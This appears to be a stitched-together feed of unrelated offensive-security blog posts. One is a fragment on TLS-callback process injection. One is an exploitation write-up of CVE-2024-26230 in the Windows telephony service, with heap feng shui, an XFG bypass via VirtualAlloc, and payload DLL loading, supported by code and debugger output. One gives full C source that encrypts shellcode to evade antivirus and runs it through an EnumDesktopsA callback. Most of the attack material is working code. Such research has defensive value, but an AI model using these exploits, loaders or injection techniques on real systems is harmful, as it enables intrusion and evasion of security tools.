New Module 34: TLS Callbacks For Anti-Debugging

New Module 35: Threadless Injection



Implementation Steps

The PoC follows these steps:

  1. Create a suspended process using the CreateProcessViaWinAPIsW function (i.e. RuntimeBroker.exe).
  2. Fetch the remote process image base address followed by reading the process's PE headers.
  3. Fetch an address to a TLS callback function.
  4. Patch a fixed shellcode (i.e. g_FixedShellcode) with runtime-retrieved values. This shellcode is responsible for restoring both original bytes and memory permission of the TLS callback function's address.
  5. Inject both shellcodes: g_FixedShellcode and the main payload.
  6. Patch the TLS callback function's address and replace it with the address of our injected payload.
  7. Resume process.

The g_FixedShellcode shellcode will then make sure that the main payload executes only once by restoring the original TLS callback's original address before calling the main payload. A TLS callback can execute multiple times across the lifespan of a process, therefore it is important to control the number of times the payload is triggered by restoring the original code path execution to the original TLS callback function.

Demo

The following image shows our implementation, RemoteTLSCallbackInjection.exe, spawning a cmd.exe as its main payload.



A trick, the story of CVE-2024-26230

10 April 2024 at 09:43

Author: k0shl of Cyber Kunlun

Summary

In April 2024, Microsoft patched a use-after-free vulnerability in the telephony service, which I reported and assigned to CVE-2024-26230. I have already completed exploitation, employing an interesting trick to bypass XFG mitigation on Windows 11.

Moving forward, in my personal blog posts regarding my vulnerability and exploitation findings, I aim not only to introduce the exploit stage but also to share my thought process on how I completed the exploitation step by step. In this blog post, I will delve into the technique behind the trick and the exploitation of CVE-2024-26230.

Root Cause

The telephony service is a RPC based service which is not running by default, but it could be actived by invoking StartServiceW API with normal user privilege.

There are only three functions in telephony RPC server interface.

long ClientAttach(
    [out][context_handle] void** arg_0, 
    [in]long arg_1, 
    [out]long *arg_2, 
    [in][string] wchar_t* arg_3, 
    [in][string] wchar_t* arg_4);

void ClientRequest(
    [in][context_handle] void* arg_0, 
    [in][out] /* [DBG] FC_CVARRAY */[size_is(arg_2)][length_is(, *arg_3)]char *arg_1/*[] CONFORMANT_ARRAY*/, 
    [in]long arg_2, 
    [in][out]long *arg_3);

void ClientDetach(
    [in][out][context_handle] void** arg_0);
} 

It's easy to understand that the ClientAttach method could create a context handle, the ClientRequest method could process requests using the specified context handle, and the ClientDetach method could release the context handle.

In fact, there is a global variable named "gaFuncs," which serves as a router variable to dispatch to specific dispatch functions within the ClientRequest method. The dispatch function it routes to depends on a value that could be controlled by an attacker.

Within the dispatch functions, numerous objects can be processed. These objects are created by the function NewObject, which inserts them into a global handle table named "ghHandleTable." Each object holds a distinct magic value. When the telephony service references an object, it invokes the function ReferenceObject to compare the magic value and retrieve it from the handle table.

The vulnerability exists with objects that possess the magic value "GOLD" which can be created by the function "GetUIDllName".

void __fastcall GetUIDllName(__int64 a1, int *a2, unsigned int a3, __int64 a4, _DWORD *a5)
{
[...]
if ( object )
      {
        *object = 0x474F4C44; // =====> [a]
        v38 = *(_QWORD *)(contexthandle + 184);
        *((_QWORD *)object + 10) = v38;
        if ( v38 )
          *(_QWORD *)(v38 + 72) = object;
        *(_QWORD *)(contexthandle + 184) = object; // =======> [b]
        a2[8] = object[22];
      }
[...]
}

As the code above, service stores the magic value 0x474F4C44(GOLD) into the object[a] and inserts object into the context handle object[b].Typically, most objects are stored within the context handle object, which is initialized in the ClientAttach function. When the service references an object, it checks whether the object is owned by the specified context handle object, as demonstrated in the following code:

    v28 = ReferenceObject(v27, a3, 0x494C4343); // reference the object
    if ( v28
      && (TRACELogPrint(262146i64, "LineProlog: ReferenceObject returned ptCallClient %p", v28),
          *((_QWORD *)v28 + 1) == context_handle_object) // check whether the object belong to context handle object )
    {

However, when the "GOLD" object is freed, it doesn't check whether the object is owned by the context handle. Therefore, I can exploit this by creating two context handles: one that holds the "GOLD" object and another to invoke the dispatch function "FreeDiagInstance" to free the "GOLD" object. Consequently, the "GOLD" object is freed while the original context handle object still holds the "GOLD" object pointer.

__int64 __fastcall FreeDialogInstance(unsigned __int64 a1, _DWORD *a2)
{
[...]
v4 = (_DWORD *)ReferenceObject(a1, (unsigned int)a2[2], 0x474F4C44i64);
  [...]
  if ( *v4 == 0x474F4C44 ) // only check if the magic value is equal to 0x474f4c44, it doesn't check if the object belong to context handle object
[...]
  // free the object
}

This results in the original context handle object holding a dangling pointer. Consequently, the dispatch function "TUISPIDLLCallback" utilizes this dangling pointer, leading to a use-after-free vulnerability. As a result, the telephony service crashes when attempting to reference a virtual function.

__int64 __fastcall TUISPIDLLCallback(__int64 a1, _DWORD *a2, int a3, __int64 a4, _DWORD *a5)
{
[...]
 v7 = (unsigned int)controlledbuffer[2];
  v8 = 0i64;
  v9 = controlledbuffer + 4;
  v10 = controlledbuffer + 5;
  if ( (unsigned int)IsBadSizeOffset(a3, 0, controlledbuffer[5], controlledbuffer[4], 4) )
    goto LABEL_30;
  switch ( controlledbuffer[3] )
  {
[...]
case 3:
      for ( freedbuffer = *(_QWORD *)(context_handle_object + 0xB8); freedbuffer; freedbuffer = *(_QWORD *)(freedbuffer + 80) ) // ===========> context handle object holds the dangling pointer at offset 0xB8
      {
        if ( controlledbuffer[2] == *(_DWORD *)(freedbuffer + 16) ) // compare the value
        {
          v8 = *(__int64 (__fastcall **)(__int64, _QWORD, __int64, _QWORD))(freedbuffer + 32); // reference the virtual function within dangling pointer
          goto LABEL_27;
        }
      }
      break;
[...]

 if ( v8 )
  {
    result = v8(v7, (unsigned int)controlledbuffer[3], a4 + *v9, *v10); // ====> trigger UaF
[...]
}

Note that the controllable buffer in the code above refers to the input buffer of the RPC client, where all content can be controlled by the attacker. This ultimately leads to a crash.

0:001> R
rax=0000000000000000 rbx=0000000000000000 rcx=3064c68a8d720000
rdx=0000000000080006 rsi=0000000000000000 rdi=00000000474f4c44
rip=00007ffcb4b4955c rsp=000000ec0f9bee80 rbp=0000000000000000
 r8=000000ec0f9bea30  r9=000000ec0f9bee90 r10=ffffffffffffffff
r11=000000ec0f9be9e8 r12=0000000000000000 r13=00000203df002b00
r14=00000203df002b00 r15=000000ec0f9bf238
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
tapisrv!FreeDialogInstance+0x7c:
00007ffc`b4b4955c 393e            cmp     dword ptr [rsi],edi ds:00000000`00000000=????????
0:001> K
 # Child-SP          RetAddr               Call Site
00 000000ec`0f9bee80 00007ffc`b4b47295     tapisrv!FreeDialogInstance+0x7c
01 000000ec`0f9bf1e0 00007ffc`b4b4c8bc     tapisrv!CleanUpClient+0x451
02 000000ec`0f9bf2a0 00007ffc`d9b85809     tapisrv!PCONTEXT_HANDLE_TYPE_rundown+0x9c
03 000000ec`0f9bf2e0 00007ffc`d9b840f6     RPCRT4!NDRSRundownContextHandle+0x21
04 000000ec`0f9bf330 00007ffc`d9bcb935     RPCRT4!DestroyContextHandlesForGuard+0xbe
05 000000ec`0f9bf370 00007ffc`d9bcb8b4     RPCRT4!OSF_ASSOCIATION::~OSF_ASSOCIATION+0x5d
06 000000ec`0f9bf3a0 00007ffc`d9bcade4     RPCRT4!OSF_ASSOCIATION::`vector deleting destructor'+0x14
07 000000ec`0f9bf3d0 00007ffc`d9bcad27     RPCRT4!OSF_ASSOCIATION::RemoveConnection+0x80
08 000000ec`0f9bf400 00007ffc`d9b8704e     RPCRT4!OSF_SCONNECTION::FreeObject+0x17
09 000000ec`0f9bf430 00007ffc`d9b861ea     RPCRT4!REFERENCED_OBJECT::RemoveReference+0x7e
0a 000000ec`0f9bf510 00007ffc`d9b97f5c     RPCRT4!OSF_SCONNECTION::ProcessReceiveComplete+0x18e
0b 000000ec`0f9bf610 00007ffc`d9b97e22     RPCRT4!CO_ConnectionThreadPoolCallback+0xbc
0c 000000ec`0f9bf690 00007ffc`d8828f51     RPCRT4!CO_NmpThreadPoolCallback+0x42
0d 000000ec`0f9bf6d0 00007ffc`db34aa58     KERNELBASE!BasepTpIoCallback+0x51
0e 000000ec`0f9bf720 00007ffc`db348d03     ntdll!TppIopExecuteCallback+0x198

Find Primitive

When I discovered this vulnerability, I quickly realized that it could be exploited because I can control the timing of both releasing and using object.

However, the first challenge of exploitation is that I need an exploit primitive. The Ring 3 world is different from the Ring 0 world. In kernel mode, I could use various objects as primitives, even if they are different types. But in user mode, I can only use objects within the same process. This means that I can't exploit the vulnerability if there isn't a suitable object in the target process.

So, I need to ensure whether there is a suitable object in the telephony service. There is a small tip that I don't even need an 'object.' What I want is just a memory allocation that I can control both size and content.

After reverse engineering, I discovered an interesting primitive. There is a dispatch function named "TRequestMakeCall" that opens the registry key of the telephony service and allocates memory to store key values.

if ( !RegOpenCurrentUser(0xF003Fu, &phkResult) ) // ==========> [a]
  {
    if ( !RegOpenKeyExW(
            phkResult,
            L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities",
            0,
            0x20019u,
            &hKey) )
    {
      GetPriorityList(hKey, L"RequestMakeCall"); // ==========> [b]
      RegCloseKey(hKey);
    }
    
///////////////////////////////////////////
if ( RegQueryValueExW(hKey, lpValueName, 0i64, &Type, 0i64, &cbData) || !cbData ) // =============> [c]
  {
    [...]
  }
  else
  {
    v6 = HeapAlloc(ghTapisrvHeap, 8u, cbData + 2); // ===========> [d]
    v7 = (wchar_t *)v6;
    if ( v6 )
    {
      *(_WORD *)v6 = 34;
      LODWORD(v6) = RegQueryValueExW(hKey, lpValueName, 0i64, &Type, (LPBYTE)v6 + 2, &cbData); // ==============> [e]
      [...]
  }

In the dispatch function "TRequestMakeCall," it first opens the HKCU root key [a] and invokes the GetPriorityList function to obtain the "RequestMakeCall" key value. After checking the key privilege, it's determined that this key can be fully controlled by the current user, meaning I could modify the key value. In the function "GetPriorityList," it first retrieves the type and size of the key, then allocates a heap to store the key value. This implies that if I can control the key value, I can also control both the heap size and the content of the heap.

The default type of "RequestMakeCall" is REG_SZ, but since the current user has full control privilege over it, I can delete the default value and create a REG_BINARY type key value. This allows me to set both the size and content to arbitrary values, making it a useful primitive.

Heap Fengshui

After ensure there is a suitable primitive, I think it's time to perform heap feng shui now. Because I can control the timing of allocating, releasing, and using the object, it's easy to come up with a layout.

  1. First, I allocate enough "GOLD" objects using the "GetUIDllName" function.
  2. Then, I free some of them to create some holes using the "FreeDiagInstance" function.
  3. Next, I allocate a worker "GOLD" object to trigger the use-after-free vulnerability.
  4. After that, I free the worker object with the vulnerability. This time, the worker context handle object still holds the dangling pointer of the worker object.
  5. Following this, I delete the "RequestMakeCall" key value and create a REG_BINARY type key with controlled content. Then, I allocate some key value heaps to ensure they occupy the hole left by the worker object.

XFG mitigation

After the final step of heap fengshui in the previous section, the controlled key value heap occupies the target hole, and when I invoke "TUISPIDLLCallback" function to trigger the "use" step, as the pseudo code above, controlled buffer is the input buffer of RPC interface, if I set it to 3, it will compare a magic value with the worker object, then obtain a virtual function address from the worker object, so that I only need to set this two value in the content of registry key value.

    RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", L"RequestMakeCall");
    RegOpenKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", &hkey);
    BYTE lpbuffer[0x5e] = { 0 };
    *(PDWORD)((ULONG_PTR)lpbuffer + 0xE) = (DWORD)0x40000018;
    *(PULONG_PTR)((ULONG_PTR)lpbuffer + 0x1E) = (ULONG_PTR)jmpaddr; // fake pointer
    RegSetValueExW(hkey, L"RequestMakeCall", 0, REG_BINARY, lpbuffer, 0x5E);

It seems that there is only one step left to complete the exploitation. I can control the address of the virtual function, which means I can control the RIP register. I can use ROP if there isn't XFG mitigation. However, XFG will limit the RIP register from jumping to a ROP gadget address, causing an INT29 exception when the control flow check fails.

Last step, the truely challenge

Just like the exploitation I introduced in my previous blog postβ€”the exploitation of CNG key isolationβ€”when I can control the RIP, it's useful to invoke LoadLibrary to load the payload DLL. However, I quickly encountered some challenges this time when attempting to set the virtual address to the LoadLibrary address.

Let's review the virtual function call in "TUISPIDLLCallback" dispatch function:

result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF
  1. The first parameter is a DWORD type value which is obtained from a RPC input buffer which could be controlled by client.
  2. The second parameter is also obtained from a RPC input buffer, but it must be a const value, it's equal to the case number I mentioned in previous section, it must be 3.
  3. The third parameter is a pointer. The buffer is the controlled buffer address with an added offset of 0x3C. Additionally, this pointer will have an offset added to it, which is obtained from the controlled RPC input buffer.
  4. The fourth parameter is a DWORD type that obtained from a controlled RPC input buffer.

It's evident that in order to jump to LoadLibrary to load the payload DLL, the first parameter should be a pointer pointing to the payload DLL path. However, in this situation, it's a DWORD type value.

So I can't use LoadLibrary directly to load payload DLL, I need to find out another way to complete the exploitation. At this time, I want to find a indirectly function to load payload DLL, because the third parameter is a pointer and the content of it I could control, I need a function has the following code:

func(a1, a2, a3, ...){
[...]
    path = a3;
    LoadLibarary(path);
[...]
}

The limitation in this scenario is that I can't control which DLL is loaded in the RPC server. Therefore, I can only use existing DLLs in the RPC server, which takes some time for me to find an eligible function. But it's failed to find an eligible function.

It seems like we're back to the beginning. I'm reviewing some APIs in MSDN again, hoping to find another scenario.

The trick

After some time, I remember an interesting API -- VirtualAlloc.

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

The first parameter of VirtualAlloc is lpAddress, which can be set to a specified value, and the process will allocate memory at this address.

I notice that I can allocate a 32-bits address with this function!

The second parameter is a constant value representing the buffer size to allocate. However, it's not necessary for my purpose. The last parameter is a controlled DWORD value, which I can set to the value for flProtect. I could set it to PAGE_EXECUTE_READWRITE (0x40).

But a new challenge arises with the third parameter.

The third parameter is flAllocationType, and in my scenario, it's a pointer. This implies that the low 32 bits of the pointer should be the flAllocationType. I need to set it to MEM_COMMIT(0x1000) | MEM_RESERVE(0x2000). Although I can control the offset, I don't know the address of the pointer, so I can't set the low 32 bits of the pointer to a specified value. I tried allocating the heap with some random value, but all of it failed.

Let's review the "use" code again:

result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF
if(!result){
[...]
}
*controlledbuffer = result;
return result;

The virtual function return value will be stored into the controlled buffer, which will then be returned to the client. This means that if I allocate memory using a function such as MIDL_user_allocate, it will return a 64-bit address, but only the low 32 bits of the address will be returned to the client. This will be a useful information disclosure.

But I still can't predict the low 32-bits value of the third parameter when invoking VirtualAlloc. So, I tried increasing the allocate buffer size to find out if there is any regularity. Actually, the maximum size of the RPC client could be set is larger than 0x40000000. When I set the allocate size to 0x40000000, I found an interesting situation.

I find out that when the allocate size is set to 0x40000000, the low 32-bits address of the pointer increases linearly, which makes it predictable.

That means, for example, if the leaked low 32-bits return 0xbd700000, I know that if I set the input buffer size to 0x40000000, the next controlled buffer's low 32-bits will be 0xfd800000. Additionally, the offset of the third parameter couldn't be larger than the input buffer size. Therefore, I need to ensure that the low 32-bits address is larger than 0xc0000000. In this way, the low 32-bits of the third parameter could be a DWORD value larger than 0x100000000 after the address is added with the offset. It's possible to set the third parameter to 0x3000 (MEM_COMMIT(0x1000) | MEM_RESERVE(0x2000)).

As for now, I make heap fengshui and control the all content of the heap hole with the controllable registry key value, and for bypassing XFG mitigation, I need to first leak the low 32-bits address by setting the MIDL_user_allocate function address in key value, and then set the VirtualAlloc function address in key value, obviously, it doesn't end if I allocate 32-bits address succeed, I need to invoke "TUISPIDLLCallback" multiple times to complete bypassing XFG mitigation. The good news is that I could control the timing of "use", so all I need to do is free the registry key value heap, set the new key value with the target function address, allocate a new key value heap, and use it again.

tapisrv!TUISPIDLLCallback+0x1cc:
00007fff`7c27fecc ff154ee80000    call    qword ptr [tapisrv!_guard_xfg_dispatch_icall_fptr (00007fff`7c28e720)] ds:00007fff`7c28e720={ntdll!LdrpDispatchUserCallTarget (00007fff`afcded40)}
0:007> u rax
KERNEL32!VirtualAllocStub:
00007fff`aeae3bf0 48ff2551110700  jmp     qword ptr [KERNEL32!_imp_VirtualAlloc (00007fff`aeb54d48)]
00007fff`aeae3bf7 cc              int     3
00007fff`aeae3bf8 cc              int     3
00007fff`aeae3bf9 cc              int     3
00007fff`aeae3bfa cc              int     3
00007fff`aeae3bfb cc              int     3
00007fff`aeae3bfc cc              int     3
00007fff`aeae3bfd cc              int     3
0:007> r r8d
r8d=3000
0:007> r r9d
r9d=40
0:007> r rcx
rcx=00000000ba000000
0:007> r rdx
rdx=0000000000000003

According to the debugging information, we can see that every parameter satisfies the request. After invoking the VirtualAlloc function, we have successfully allocated a 32-bit address.

0:007> p
tapisrv!TUISPIDLLCallback+0x1d2:
00007fff`7c27fed2 85c0            test    eax,eax
0:007> dq ba000000
00000000`ba000000  00000000`00000000 00000000`00000000
00000000`ba000010  00000000`00000000 00000000`00000000
00000000`ba000020  00000000`00000000 00000000`00000000
00000000`ba000030  00000000`00000000 00000000`00000000
00000000`ba000040  00000000`00000000 00000000`00000000

This means I have successfully controlled the first parameter as a pointer. The next step is to copy the payload DLL path into the 32-bit address. However, I can't use the memcpy function because the second parameter is a constant value, which must be 3. Instead, I decide to use the memcpy_s function, where the second parameter represents the copy length and the third parameter is the source address. I can only copy 3 bytes at a time, but I can invoke it multiple times to complete the path copying.

0:009> dc ba000000
00000000`ba000000  003a0043 0055005c 00650073 00730072  C.:.\.U.s.e.r.s.
00000000`ba000010  0070005c 006e0077 0041005c 00700070  \.p.w.n.\.A.p.p.
00000000`ba000020  00610044 00610074 0052005c 0061006f  D.a.t.a.\.R.o.a.
00000000`ba000030  0069006d 0067006e 0066005c 006b0061  m.i.n.g.\.f.a.k.
00000000`ba000040  00640065 006c006c 0064002e 006c006c  e.d.l.l...d.l.l.

There is one step last is invoking LoadLibrary to load payload DLL.

0:009> u
KERNELBASE!LoadLibraryW:
00007fff`ad1f2480 4533c0          xor     r8d,r8d
00007fff`ad1f2483 33d2            xor     edx,edx
00007fff`ad1f2485 e9e642faff      jmp     KERNELBASE!LoadLibraryExW (00007fff`ad196770)
00007fff`ad1f248a cc              int     3
00007fff`ad1f248b cc              int     3
00007fff`ad1f248c cc              int     3
00007fff`ad1f248d cc              int     3
00007fff`ad1f248e cc              int     3
0:009> dc rcx
00000000`ba000000  003a0043 0055005c 00650073 00730072  C.:.\.U.s.e.r.s.
00000000`ba000010  0070005c 006e0077 0041005c 00700070  \.p.w.n.\.A.p.p.
00000000`ba000020  00610044 00610074 0052005c 0061006f  D.a.t.a.\.R.o.a.
00000000`ba000030  0069006d 0067006e 0066005c 006b0061  m.i.n.g.\.f.a.k.
00000000`ba000040  00640065 006c006c 0064002e 006c006c  e.d.l.l...d.l.l.
00000000`ba000050  00000000 00000000 00000000 00000000  ................
00000000`ba000060  00000000 00000000 00000000 00000000  ................
00000000`ba000070  00000000 00000000 00000000 00000000  ................
0:009> k
 # Child-SP          RetAddr               Call Site
00 000000ab`ac97eac8 00007fff`7c27fed2     KERNELBASE!LoadLibraryW
01 000000ab`ac97ead0 00007fff`7c27817a     tapisrv!TUISPIDLLCallback+0x1d2
02 000000ab`ac97eb60 00007fff`afb57f13     tapisrv!ClientRequest+0xba

Malware and cryptography 26: encrypt/decrypt payload via SAFER. Simple C/C++ example.

9 April 2024 at 01:00

ο·½

Hello, cybersecurity enthusiasts and white hackers!

cryptography

This post is the result of my own research on try to evasion AV engines via encrypting payload with another algorithm: SAFER. As usual, exploring various crypto algorithms, I decided to check what would happen if we apply this to encrypt/decrypt the payload.

SAFER

SAFER (Secure And Fast Encryption Routine) is a symmetric block cipher designed by James Massey. SAFER K-64 specifically refers to the variant with a 64-bit key size. It’s notable for its nonproprietary nature and has been incorporated into some products by Cylink Corp.

SAFER K-64 operates as an iterated block cipher, meaning the same function is applied for a certain number of rounds. Each round utilizes two 64-bit subkeys, and the algorithm exclusively employs operations on bytes. Unlike DES, SAFER K-64 is not a Feistel network.

practical example

For practical example, here is the step-by-step flow of the SAFER-64:

// extract left and right halves of the data block
L = data_ptr[0];
R = data_ptr[1];

// SAFER-64 encryption rounds
for (i = 0; i < ROUNDS; i++) {
  T = R ^ key_ptr[i % 4];
  T = (T << 1) | (T >> 31); // Rotate left by 1 bit
  L ^= (T + R);
  T = L ^ key_ptr[(i % 4) + 4];
  T = (T << 1) | (T >> 31); // Rotate left by 1 bit
  R ^= (T + L);
}

// update the data block with the encrypted values
data_ptr[0] = L;
data_ptr[1] = R;

So, the encryption function looks like this:

void safer_encrypt(unsigned char *data, unsigned char *key) {
  unsigned int *data_ptr = (unsigned int *)data;
  unsigned int *key_ptr = (unsigned int *)key;
  unsigned int L, R, T;
  int i;

  L = data_ptr[0];
  R = data_ptr[1];

  for (i = 0; i < ROUNDS; i++) {
    T = R ^ key_ptr[i % 4];
    T = (T << 1) | (T >> 31);
    L ^= (T + R);
    T = L ^ key_ptr[(i % 4) + 4];
    T = (T << 1) | (T >> 31);
    R ^= (T + L);
  }

  data_ptr[0] = L;
  data_ptr[1] = R;
}

What about decryption logic? The decryption process is not much different from encryption:

// extract left and right halves of the data block
L = data_ptr[0];
R = data_ptr[1];

// SAFER-64 decryption rounds
for (i = ROUNDS - 1; i >= 0; i--) {
  T = L ^ key_ptr[(i % 4) + 4];
  T = (T << 1) | (T >> 31); // Rotate left by 1 bit
  R ^= (T + L);
  T = R ^ key_ptr[i % 4];
  T = (T << 1) | (T >> 31); // Rotate left by 1 bit
  L ^= (T + R);
}

// Update the data block with the decrypted values
data_ptr[0] = L;
data_ptr[1] = R;

Respectively, SAFER-64 Decryption Function looks like this:

void safer_decrypt(unsigned char *data, unsigned char *key) {
  unsigned int *data_ptr = (unsigned int *)data;
  unsigned int *key_ptr = (unsigned int *)key;
  unsigned int L, R, T;
  int i;

  L = data_ptr[0];
  R = data_ptr[1];

  for (i = ROUNDS - 1; i >= 0; i--) {
    T = L ^ key_ptr[(i % 4) + 4];
    T = (T << 1) | (T >> 31);
    R ^= (T + L);
    T = R ^ key_ptr[i % 4];
    T = (T << 1) | (T >> 31);
    L ^= (T + R);
  }

  data_ptr[0] = L;
  data_ptr[1] = R;
}

Full source code for my main logic (β€œmalicious” payload encryption) look like this (hack.c):

/*
 * hack.c - encrypt and decrypt shellcode via SAFER. C++ implementation
 * @cocomelonc
 * https://cocomelonc.github.io/malware/2024/04/09/malware-cryptography-26.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define BLOCK_SIZE 8 // 64 bits
#define ROUNDS 6

void safer_encrypt(unsigned char *data, unsigned char *key) {
  unsigned int *data_ptr = (unsigned int *)data;
  unsigned int *key_ptr = (unsigned int *)key;
  unsigned int L, R, T;
  int i;

  L = data_ptr[0];
  R = data_ptr[1];

  for (i = 0; i < ROUNDS; i++) {
    T = R ^ key_ptr[i % 4];
    T = (T << 1) | (T >> 31);
    L ^= (T + R);
    T = L ^ key_ptr[(i % 4) + 4];
    T = (T << 1) | (T >> 31);
    R ^= (T + L);
  }

  data_ptr[0] = L;
  data_ptr[1] = R;
}

void safer_decrypt(unsigned char *data, unsigned char *key) {
  unsigned int *data_ptr = (unsigned int *)data;
  unsigned int *key_ptr = (unsigned int *)key;
  unsigned int L, R, T;
  int i;

  L = data_ptr[0];
  R = data_ptr[1];

  for (i = ROUNDS - 1; i >= 0; i--) {
    T = L ^ key_ptr[(i % 4) + 4];
    T = (T << 1) | (T >> 31);
    R ^= (T + L);
    T = R ^ key_ptr[i % 4];
    T = (T << 1) | (T >> 31);
    L ^= (T + R);
  }

  data_ptr[0] = L;
  data_ptr[1] = R;
}

int main() {
  unsigned char key[] = "\x6d\x65\x6f\x77\x6d\x65\x6f\x77\x6d\x65\x6f\x77\x6d\x65\x6f\x77";
  unsigned char my_payload[] =
  "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
  "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
  "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
  "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
  "\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
  "\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
  "\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
  "\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
  "\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
  "\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
  "\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
  "\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
  "\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
  "\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
  "\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
  "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
  "\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
  "\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
  "\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
  "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
  "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
  "\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
  "\x2e\x2e\x5e\x3d\x00";

  int len = sizeof(my_payload);
  int pad_len = (len + BLOCK_SIZE - 1) & ~(BLOCK_SIZE - 1);

  unsigned char padded[pad_len];
  memset(padded, 0x90, pad_len);
  memcpy(padded, my_payload, len);

  // encrypt the padded shellcode
  for (int i = 0; i < pad_len; i += BLOCK_SIZE) {
    safer_encrypt(&padded[i], key);
  }

  printf("encrypted:\n");
  for (int i = 0; i < sizeof(padded); i++) {
    printf("\\x%02x", padded[i]);
  }
  printf("\n\n");

  // decrypt the padded shellcode
  for (int i = 0; i < pad_len; i += BLOCK_SIZE) {
    safer_decrypt(&padded[i], key);
  }

  printf("decrypted:\n");
  for (int i = 0; i < sizeof(padded); i++) {
    printf("\\x%02x", padded[i]);
  }
  printf("\n\n");

  LPVOID mem = VirtualAlloc(NULL, sizeof(padded), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  RtlMoveMemory(mem, padded, pad_len);
  EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);

  return 0;
}

As you can see, first of all, before encrypting, we use padding via the NOP (\x90) instructions.

As usually, I used meow-meow payload:

"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";

For simplicity, I use running shellcode via EnumDesktopsA logic.

demo

Let’s go to see this trick in action. Compile our β€œmalware”:

